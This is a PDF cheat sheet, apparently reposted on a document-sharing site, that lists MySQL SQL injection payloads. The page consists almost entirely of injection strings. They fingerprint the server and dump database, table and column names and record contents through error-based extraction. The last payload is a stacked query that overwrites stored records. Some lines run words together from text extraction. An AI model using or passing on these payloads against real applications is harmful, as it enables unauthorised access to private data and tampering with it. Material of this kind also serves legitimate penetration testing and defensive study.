Upload
akukurt
View
222
Download
0
Embed Size (px)
Citation preview
8/3/2019 MySQL Blind SQL Cheat Sheets
1/3
MySQL Blind SQL Cheat Sheets
0x1 Author : nishant
0x2 Compiled by : akukurt
Note: The data is fetched using a Hex() and a type casting with the cast() to make the
query reliable and avoid bad characters and format strings issue (for example 0x00 as
the last byte of every data fetched.) These payloads heavily rely on the
information_schema database. So if you don't get the desired result, it just means that
the remote database server doesn't have it.
1. To test blind injection
Code:
' and 'x'='x
2. To select the current database (Output will be in Hexadecimal, decode
to ASCII
Code:
' and(select 1 from(select count(*),concat((select (selectconcat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x frominformation_schema.tables group by x)a) and '1'='1
3. To find the current user
Code:
1' and(select 1 from(select count(*),concat((select (selectconcat(0x7e,0x27,Hex(cast(user() as char)),0x27,0x7e)) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x frominformation_schema.tables group by x)a) and '1'='1
4. To find MySQL Version
Code:
1' and(select 1 from(select count(*),concat((select (selectconcat(0x7e,0x27,Hex(cast(version() as char)),0x27,0x7e)) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x frominformation_schema.tables group by x)a) and '1'='1
5. Find current database
Code:
1' and(select 1 from(select count(*),concat((select (selectconcat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x frominformation_schema.tables group by x)a) and '1'='1
6. To find the system user
Code:
1' and(select 1 from(select count(*),concat((select (selectconcat(0x7e,0x27,Hex(cast(system_user() as char)),0x27,0x7e)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x frominformation_schema.tables group by x)a) and '1'='1
8/3/2019 MySQL Blind SQL Cheat Sheets
2/3
7. To find the hostname
Code:
1' and(select 1 from(select count(*),concat((select (selectconcat(0x7e,0x27,Hex(cast(@@hostname as char)),0x27,0x7e)) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and '1'='1
8. To find the installation directory
Code:
1' and(select 1 from(select count(*),concat((select (selectconcat(0x7e,0x27,Hex(cast(@@basedir as char)),0x27,0x7e)) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x frominformation_schema.tables group by x)a) and '1'='1
9. To find the DB User
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT distinctconcat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROMinformation_schema.user_privileges LIMIT 0,1)) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and '1'='1
10. To find the databases
Note: Keep incrementing the n, e.g. : n, n+1, n+2, ... till you keep getting aresponse.
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT distinctconcat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM
information_schema.user_privileges LIMIT 1,1)) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x frominformation_schema.tables group by x)a) and '1'='1
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT distinctconcat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROMinformation_schema.schemata LIMIT n,1)) from information_schema.tables limit0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and
'1'='1
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT distinctconcat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM
information_schema.schemata LIMIT n+1,1)) from information_schema.tableslimit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and '1'='1
11. To count the number of tables in the selected database
Note: Note this count as nReplace colored strings with appropriate value
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECTconcat(0x7e,0x27,count(table_name),0x27,0x7e) FROM`information_schema`.tables WHERE table_schema=0xhex_code_of_database_name))from information_schema.tables limit 0,1),floor(rand(0)*2))x frominformation_schema.tables group by x)a) and '1'='1
8/3/2019 MySQL Blind SQL Cheat Sheets
3/3
12. To get the table names in the selected database
Note: m-n implies execute this query starting from m, m+1n-1Replace colored strings with appropriate value
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT distinctconcat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROMinformation_schema.tables Where table_schema=0xhex_code_of_database_namelimit m-n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))xfrom information_schema.tables group by x)a) and '1'='1
13. To get number of columns in the selected table nameNote: Note this count as n
Replace colored strings with appropriate value
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECTconcat(0x7e,0x27,count(column_name),0x27,0x7e) FROM`information_schema`.columns WHERE table_schema=0xhex_code_of_database_name
AND table_name=0xhex_code_of_table_name)) from information_schema.tableslimit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and '1'='1
14. To get column names of a selected table nameNote: m-n implies execute this query starting from m, m+1n-1
Replace colored strings with appropriate value
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT distinctconcat(0x7e,0x27,Hex(cast(column_name as char)),0x27,0x7e) FROMinformation_schema.columns Where table_schema=0xhex_code_of_database_name
AND table_name=0xhex_code_of_table_name limit m-n,1)) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and '1'='1
15. To count the number of records in a selected columnNote: Remember this count as n
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECTconcat(0x7e,0x27,count(*),0x27,0x7e) FROM `database_name`.table_name)) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and '1'='1
16. To fetch records from a selected column
Note: m-n implies execute this query starting from m, m+1n-1Replace colored strings with appropriate value
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECTconcat(0x7e,0x27,Hex(cast(table_name.column_name as char)),0x27,0x7e) FROM`database_name`.table_name LIMIT m-n,1) ) from information_schema.tableslimit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and '1'='1
17. Update a record in the selected column
Code:
1';UPDATE table_name SET column_name=0xhex_code_of_new_record_value WHEREcolumn_name=0xhex_code_of_old_record_value--